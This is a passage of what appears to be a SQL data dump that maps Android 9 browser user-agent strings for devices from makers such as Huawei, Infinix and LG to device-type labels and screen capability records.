Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; INE-LX1r) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; INE-LX2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; INE-LX2r) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; INE-TL00) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; Infinix X5515F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_infinix','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; Infinix X5516B) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_infinix','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; Infinix X604) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_infinix','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; Infinix X605) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_infinix','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; Infinix X610B) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_infinix','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; Infinix X625B) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_infinix','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":750,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; Infinix X625C) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_infinix','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":750,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; Infinix X625D) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_infinix','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":750,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; Infinix X626) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_infinix','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; Infinix X626B) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_infinix','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; Infinix X627) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_infinix','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; Infinix X627V) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_infinix','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; Infinix X650B) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_infinix','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; Infinix X650C) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_infinix','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; Infinix X650D) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_infinix','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; Infinix X652) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_infinix','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; Infinix X652A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_infinix','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; Infinix X652B) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_infinix','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; Infinix X652C) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_infinix','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; Infinix X653) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_infinix','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; Infinix X653C) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_infinix','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; J5) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; J7) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; J9110) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":960,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; J9210) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":960,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; JAT-AL00) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; JAT-L29) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; JAT-L41) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; JAT-LX1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; JAT-LX3) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; JDN2-L09) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":533,\"screenHeight\":853,\"pixelRatio\":2.25,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; JDN2-W09) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":533,\"screenHeight\":853,\"pixelRatio\":2.25,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; JKM-LX1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; JKM-LX2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; JKM-LX3) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; JSN-AL00a) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; JSN-L21) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; JSN-L22) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; JSN-L23) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; JSN-L42) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; Joy 2+) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; K12) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; K13_Pro) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; K55h) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; K5b) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; K7_Pro) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; K9) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":748,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; KFMUWI) AppleWebKit/* (KHTML, like Gecko) Silk like Chrome Safari/*','android_mozilla','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":600,\"screenHeight\":1024,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; KINGKONG_MINI) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; KSA-LX3) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; KSA-LX9) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; KYV44) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; KYV45) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; KYV46) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; L-01K) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; L-01L) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; L-03K) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; L553) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; LEX720) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; LEX722) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; LEX820) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; LEX821) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; LEX829) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; LG-D855) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; LG-G710) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":118,\"screenHeight\":255,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; LG-H870) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; LG-H870DS) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; LG-H871) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; LG-H873) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; LG-H930) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; LG-H931) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; LG-H932) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; LG-H933) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; LG-US998) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":823,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; LGL322DL) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":823,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; LGL722DL) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":823,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; LGM-G600K) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; LGM-G600L) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; LGM-V300L) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; LGV35) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; LIV1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; LLD-AL10) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile 